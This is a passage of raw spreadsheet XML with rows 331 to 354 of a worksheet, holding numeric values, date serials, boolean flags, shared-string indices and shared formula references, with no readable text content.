        <v>1656</v>
      </c>
      <c r="G331" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H331" s="4">
        <v>44565.572916666664</v>
      </c>
      <c r="I331" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J331" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K331" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L331" s="1">
        <v>6.0</v>
      </c>
      <c r="M331" s="1">
        <v>8.0</v>
      </c>
      <c r="N331" s="1" t="s">
        <v>949</v>
      </c>
      <c r="O331" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P331" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q331" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R331" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S331" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="1">
        <v>4843.0</v>
      </c>
      <c r="B332" s="2" t="s">
        <v>1657</v>
      </c>
      <c r="C332" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D332" s="2" t="s">
        <v>1658</v>
      </c>
      <c r="E332" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F332" s="1" t="s">
        <v>1659</v>
      </c>
      <c r="G332" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H332" s="4">
        <v>44565.67291666667</v>
      </c>
      <c r="I332" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J332" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K332" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L332" s="1">
        <v>6.0</v>
      </c>
      <c r="M332" s="1">
        <v>8.0</v>
      </c>
      <c r="N332" s="1" t="s">
        <v>1660</v>
      </c>
      <c r="O332" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P332" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q332" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R332" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S332" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="1">
        <v>4844.0</v>
      </c>
      <c r="B333" s="2" t="s">
        <v>1661</v>
      </c>
      <c r="C333" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D333" s="2" t="s">
        <v>1662</v>
      </c>
      <c r="E333" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F333" s="1" t="s">
        <v>1663</v>
      </c>
      <c r="G333" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H333" s="4">
        <v>44565.68263888889</v>
      </c>
      <c r="I333" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J333" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K333" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L333" s="1">
        <v>6.0</v>
      </c>
      <c r="M333" s="1">
        <v>8.0</v>
      </c>
      <c r="N333" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O333" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P333" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q333" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R333" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S333" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="1">
        <v>4846.0</v>
      </c>
      <c r="B334" s="2" t="s">
        <v>1664</v>
      </c>
      <c r="C334" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D334" s="2" t="s">
        <v>1665</v>
      </c>
      <c r="E334" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F334" s="1" t="s">
        <v>768</v>
      </c>
      <c r="G334" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H334" s="4">
        <v>44596.53055555555</v>
      </c>
      <c r="I334" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J334" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K334" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L334" s="1">
        <v>6.0</v>
      </c>
      <c r="M334" s="1">
        <v>8.0</v>
      </c>
      <c r="N334" s="1" t="s">
        <v>1666</v>
      </c>
      <c r="O334" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P334" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q334" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R334" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S334" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="1">
        <v>4848.0</v>
      </c>
      <c r="B335" s="2" t="s">
        <v>1667</v>
      </c>
      <c r="C335" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D335" s="2" t="s">
        <v>1668</v>
      </c>
      <c r="E335" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F335" s="1" t="s">
        <v>1669</v>
      </c>
      <c r="G335" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H335" s="1" t="s">
        <v>1670</v>
      </c>
      <c r="I335" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J335" s="1" t="s">
        <v>1652</v>
      </c>
      <c r="K335" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="L335" s="1">
        <v>6.0</v>
      </c>
      <c r="M335" s="1">
        <v>8.0</v>
      </c>
      <c r="N335" s="1" t="s">
        <v>1671</v>
      </c>
      <c r="O335" s="1" t="s">
        <v>1654</v>
      </c>
      <c r="P335" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q335" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R335" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S335" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="1">
        <v>4861.0</v>
      </c>
      <c r="B336" s="2" t="s">
        <v>1672</v>
      </c>
      <c r="C336" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D336" s="2" t="s">
        <v>1673</v>
      </c>
      <c r="E336" s="2" t="s">
        <v>1674</v>
      </c>
      <c r="F336" s="1" t="s">
        <v>1675</v>
      </c>
      <c r="G336" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H336" s="1" t="s">
        <v>1676</v>
      </c>
      <c r="I336" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J336" s="1" t="s">
        <v>1677</v>
      </c>
      <c r="K336" s="2" t="s">
        <v>1678</v>
      </c>
      <c r="L336" s="1">
        <v>1.0</v>
      </c>
      <c r="M336" s="1">
        <v>1.0</v>
      </c>
      <c r="N336" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O336" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P336" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q336" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R336" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S336" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="1">
        <v>4862.0</v>
      </c>
      <c r="B337" s="2" t="s">
        <v>1679</v>
      </c>
      <c r="C337" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D337" s="2" t="s">
        <v>1680</v>
      </c>
      <c r="E337" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F337" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G337" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H337" s="4">
        <v>44531.989583333336</v>
      </c>
      <c r="I337" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J337" s="1" t="s">
        <v>1681</v>
      </c>
      <c r="K337" s="2" t="s">
        <v>1682</v>
      </c>
      <c r="L337" s="1">
        <v>1.0</v>
      </c>
      <c r="M337" s="1">
        <v>1.0</v>
      </c>
      <c r="N337" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O337" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P337" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q337" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R337" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S337" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="1">
        <v>4897.0</v>
      </c>
      <c r="B338" s="2" t="s">
        <v>1683</v>
      </c>
      <c r="C338" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D338" s="2" t="s">
        <v>1684</v>
      </c>
      <c r="E338" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F338" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G338" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H338" s="1" t="s">
        <v>1685</v>
      </c>
      <c r="I338" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J338" s="1" t="s">
        <v>1686</v>
      </c>
      <c r="K338" s="2" t="s">
        <v>1687</v>
      </c>
      <c r="L338" s="1">
        <v>1.0</v>
      </c>
      <c r="M338" s="1">
        <v>1.0</v>
      </c>
      <c r="N338" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O338" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P338" s="1" t="s">
        <v>1688</v>
      </c>
      <c r="Q338" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R338" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S338" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="1">
        <v>4909.0</v>
      </c>
      <c r="B339" s="2" t="s">
        <v>1689</v>
      </c>
      <c r="C339" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D339" s="2" t="s">
        <v>1690</v>
      </c>
      <c r="E339" s="2" t="s">
        <v>517</v>
      </c>
      <c r="F339" s="1" t="s">
        <v>1691</v>
      </c>
      <c r="G339" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H339" s="4">
        <v>44230.319444444445</v>
      </c>
      <c r="I339" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J339" s="1" t="s">
        <v>1692</v>
      </c>
      <c r="K339" s="2" t="s">
        <v>1693</v>
      </c>
      <c r="L339" s="1">
        <v>2.0</v>
      </c>
      <c r="M339" s="1">
        <v>4.0</v>
      </c>
      <c r="N339" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O339" s="1" t="s">
        <v>1694</v>
      </c>
      <c r="P339" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q339" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R339" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S339" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="1">
        <v>4910.0</v>
      </c>
      <c r="B340" s="2" t="s">
        <v>1695</v>
      </c>
      <c r="C340" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D340" s="2" t="s">
        <v>1696</v>
      </c>
      <c r="E340" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F340" s="1" t="s">
        <v>1697</v>
      </c>
      <c r="G340" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H340" s="4">
        <v>44230.850694444445</v>
      </c>
      <c r="I340" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J340" s="1" t="s">
        <v>1692</v>
      </c>
      <c r="K340" s="2" t="s">
        <v>1693</v>
      </c>
      <c r="L340" s="1">
        <v>2.0</v>
      </c>
      <c r="M340" s="1">
        <v>4.0</v>
      </c>
      <c r="N340" s="1" t="s">
        <v>1698</v>
      </c>
      <c r="O340" s="1" t="s">
        <v>1694</v>
      </c>
      <c r="P340" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q340" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R340" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S340" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="1">
        <v>4911.0</v>
      </c>
      <c r="B341" s="2" t="s">
        <v>1699</v>
      </c>
      <c r="C341" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D341" s="2" t="s">
        <v>1690</v>
      </c>
      <c r="E341" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F341" s="1" t="s">
        <v>1691</v>
      </c>
      <c r="G341" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H341" s="4">
        <v>44258.27638888889</v>
      </c>
      <c r="I341" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J341" s="1" t="s">
        <v>1692</v>
      </c>
      <c r="K341" s="2" t="s">
        <v>1693</v>
      </c>
      <c r="L341" s="1">
        <v>2.0</v>
      </c>
      <c r="M341" s="1">
        <v>4.0</v>
      </c>
      <c r="N341" s="1" t="s">
        <v>1700</v>
      </c>
      <c r="O341" s="1" t="s">
        <v>1694</v>
      </c>
      <c r="P341" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q341" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R341" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S341" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="1">
        <v>4912.0</v>
      </c>
      <c r="B342" s="2" t="s">
        <v>1701</v>
      </c>
      <c r="C342" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D342" s="2" t="s">
        <v>1690</v>
      </c>
      <c r="E342" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F342" s="1" t="s">
        <v>1697</v>
      </c>
      <c r="G342" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H342" s="4">
        <v>44258.81527777778</v>
      </c>
      <c r="I342" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J342" s="1" t="s">
        <v>1692</v>
      </c>
      <c r="K342" s="2" t="s">
        <v>1693</v>
      </c>
      <c r="L342" s="1">
        <v>2.0</v>
      </c>
      <c r="M342" s="1">
        <v>4.0</v>
      </c>
      <c r="N342" s="1" t="s">
        <v>1702</v>
      </c>
      <c r="O342" s="1" t="s">
        <v>1694</v>
      </c>
      <c r="P342" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q342" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R342" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S342" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="1">
        <v>4959.0</v>
      </c>
      <c r="B343" s="2" t="s">
        <v>1703</v>
      </c>
      <c r="C343" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D343" s="2" t="s">
        <v>1704</v>
      </c>
      <c r="E343" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F343" s="1" t="s">
        <v>1290</v>
      </c>
      <c r="G343" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H343" s="4">
        <v>43227.09861111111</v>
      </c>
      <c r="I343" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J343" s="1" t="s">
        <v>1705</v>
      </c>
      <c r="K343" s="2" t="s">
        <v>1706</v>
      </c>
      <c r="L343" s="1">
        <v>2.0</v>
      </c>
      <c r="M343" s="1">
        <v>4.0</v>
      </c>
      <c r="N343" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O343" s="1" t="s">
        <v>372</v>
      </c>
      <c r="P343" s="1" t="s">
        <v>456</v>
      </c>
      <c r="Q343" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R343" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S343" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="1">
        <v>4963.0</v>
      </c>
      <c r="B344" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C344" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D344" s="2" t="s">
        <v>1708</v>
      </c>
      <c r="E344" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F344" s="1" t="s">
        <v>1709</v>
      </c>
      <c r="G344" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H344" s="1" t="s">
        <v>1710</v>
      </c>
      <c r="I344" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J344" s="1" t="s">
        <v>1712</v>
      </c>
      <c r="K344" s="2" t="s">
        <v>1713</v>
      </c>
      <c r="L344" s="1">
        <v>2.0</v>
      </c>
      <c r="M344" s="1">
        <v>2.0</v>
      </c>
      <c r="N344" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O344" s="1" t="s">
        <v>1714</v>
      </c>
      <c r="P344" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q344" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R344" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S344" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="1">
        <v>4964.0</v>
      </c>
      <c r="B345" s="2" t="s">
        <v>1715</v>
      </c>
      <c r="C345" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D345" s="2" t="s">
        <v>1716</v>
      </c>
      <c r="E345" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F345" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G345" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H345" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="I345" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J345" s="1" t="s">
        <v>1712</v>
      </c>
      <c r="K345" s="2" t="s">
        <v>1713</v>
      </c>
      <c r="L345" s="1">
        <v>2.0</v>
      </c>
      <c r="M345" s="1">
        <v>2.0</v>
      </c>
      <c r="N345" s="1" t="s">
        <v>1714</v>
      </c>
      <c r="O345" s="1" t="s">
        <v>1714</v>
      </c>
      <c r="P345" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q345" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R345" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S345" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="1">
        <v>5091.0</v>
      </c>
      <c r="B346" s="2" t="s">
        <v>1718</v>
      </c>
      <c r="C346" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D346" s="2" t="s">
        <v>1719</v>
      </c>
      <c r="E346" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F346" s="1" t="s">
        <v>1720</v>
      </c>
      <c r="G346" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H346" s="1" t="s">
        <v>1721</v>
      </c>
      <c r="I346" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J346" s="1" t="s">
        <v>1722</v>
      </c>
      <c r="K346" s="2" t="s">
        <v>1723</v>
      </c>
      <c r="L346" s="1">
        <v>1.0</v>
      </c>
      <c r="M346" s="1">
        <v>1.0</v>
      </c>
      <c r="N346" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O346" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P346" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q346" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R346" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S346" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="1">
        <v>5092.0</v>
      </c>
      <c r="B347" s="2" t="s">
        <v>1724</v>
      </c>
      <c r="C347" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D347" s="2" t="s">
        <v>1725</v>
      </c>
      <c r="E347" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F347" s="1" t="s">
        <v>1726</v>
      </c>
      <c r="G347" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H347" s="1" t="s">
        <v>1727</v>
      </c>
      <c r="I347" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J347" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="K347" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="L347" s="1">
        <v>4.0</v>
      </c>
      <c r="M347" s="1">
        <v>10.0</v>
      </c>
      <c r="N347" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O347" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="P347" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q347" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R347" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S347" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="1">
        <v>5093.0</v>
      </c>
      <c r="B348" s="2" t="s">
        <v>1731</v>
      </c>
      <c r="C348" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D348" s="2" t="s">
        <v>1732</v>
      </c>
      <c r="E348" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F348" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="G348" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H348" s="1" t="s">
        <v>1734</v>
      </c>
      <c r="I348" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J348" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="K348" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="L348" s="1">
        <v>4.0</v>
      </c>
      <c r="M348" s="1">
        <v>10.0</v>
      </c>
      <c r="N348" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O348" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="P348" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q348" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R348" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S348" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="1">
        <v>5095.0</v>
      </c>
      <c r="B349" s="2" t="s">
        <v>1735</v>
      </c>
      <c r="C349" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D349" s="2" t="s">
        <v>1732</v>
      </c>
      <c r="E349" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F349" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="G349" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H349" s="1" t="s">
        <v>1736</v>
      </c>
      <c r="I349" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J349" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="K349" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="L349" s="1">
        <v>4.0</v>
      </c>
      <c r="M349" s="1">
        <v>10.0</v>
      </c>
      <c r="N349" s="1" t="s">
        <v>1737</v>
      </c>
      <c r="O349" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="P349" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q349" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R349" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S349" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="1">
        <v>5097.0</v>
      </c>
      <c r="B350" s="2" t="s">
        <v>1738</v>
      </c>
      <c r="C350" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D350" s="2" t="s">
        <v>1732</v>
      </c>
      <c r="E350" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F350" s="1" t="s">
        <v>1370</v>
      </c>
      <c r="G350" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H350" s="1" t="s">
        <v>1739</v>
      </c>
      <c r="I350" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J350" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="K350" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="L350" s="1">
        <v>4.0</v>
      </c>
      <c r="M350" s="1">
        <v>10.0</v>
      </c>
      <c r="N350" s="1" t="s">
        <v>1740</v>
      </c>
      <c r="O350" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="P350" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q350" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R350" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S350" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="1">
        <v>5101.0</v>
      </c>
      <c r="B351" s="2" t="s">
        <v>1741</v>
      </c>
      <c r="C351" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D351" s="2" t="s">
        <v>1732</v>
      </c>
      <c r="E351" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F351" s="1" t="s">
        <v>1733</v>
      </c>
      <c r="G351" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H351" s="1" t="s">
        <v>1742</v>
      </c>
      <c r="I351" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J351" s="1" t="s">
        <v>1728</v>
      </c>
      <c r="K351" s="2" t="s">
        <v>1729</v>
      </c>
      <c r="L351" s="1">
        <v>4.0</v>
      </c>
      <c r="M351" s="1">
        <v>10.0</v>
      </c>
      <c r="N351" s="1" t="s">
        <v>1743</v>
      </c>
      <c r="O351" s="1" t="s">
        <v>1730</v>
      </c>
      <c r="P351" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q351" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R351" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S351" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="1">
        <v>5102.0</v>
      </c>
      <c r="B352" s="2" t="s">
        <v>1744</v>
      </c>
      <c r="C352" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D352" s="2" t="s">
        <v>1745</v>
      </c>
      <c r="E352" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F352" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G352" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H352" s="1" t="s">
        <v>1746</v>
      </c>
      <c r="I352" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J352" s="1" t="s">
        <v>1747</v>
      </c>
      <c r="K352" s="2" t="s">
        <v>1748</v>
      </c>
      <c r="L352" s="1">
        <v>1.0</v>
      </c>
      <c r="M352" s="1">
        <v>1.0</v>
      </c>
      <c r="N352" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O352" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P352" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q352" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R352" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S352" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="1">
        <v>5103.0</v>
      </c>
      <c r="B353" s="2" t="s">
        <v>1749</v>
      </c>
      <c r="C353" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D353" s="2" t="s">
        <v>1750</v>
      </c>
      <c r="E353" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F353" s="1" t="s">
        <v>1751</v>
      </c>
      <c r="G353" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H353" s="1" t="s">
        <v>1752</v>
      </c>
      <c r="I353" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J353" s="1" t="s">
        <v>1753</v>
      </c>
      <c r="K353" s="2" t="s">
        <v>1754</v>
      </c>
      <c r="L353" s="1">
        <v>3.0</v>
      </c>
      <c r="M353" s="1">
        <v>3.0</v>
      </c>
      <c r="N353" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O353" s="1" t="s">
        <v>1755</v>
      </c>
      <c r="P353" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q353" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R353" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S353" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="1">
        <v>5106.0</v>
      </c>
      <c r="B354" s="2" t="s">
        <v>1756</v>
      </c>
      <c r="C354" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D354" s="2" t="s">
        <v>1757</v>
      </c>
      <c r="E354" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F354" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G354" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H354" s="1" t="s">
        <v>1758</v>
      </c>
      <c r="I354" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J354" s="1" t="s">
        <v>1759</v>
      </c>
      <c r="K354" s="2" t="s">
        <v>1760</v>
      </c>
      <c r="L354" s="1">
        <v>2.0</v>
      </c>
      <c r="M354" s="1">
        <v>2.0</v>
      </c>
      <c r="N354" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O354" s="1" t="s">
        <v>1761</v>
      </c>
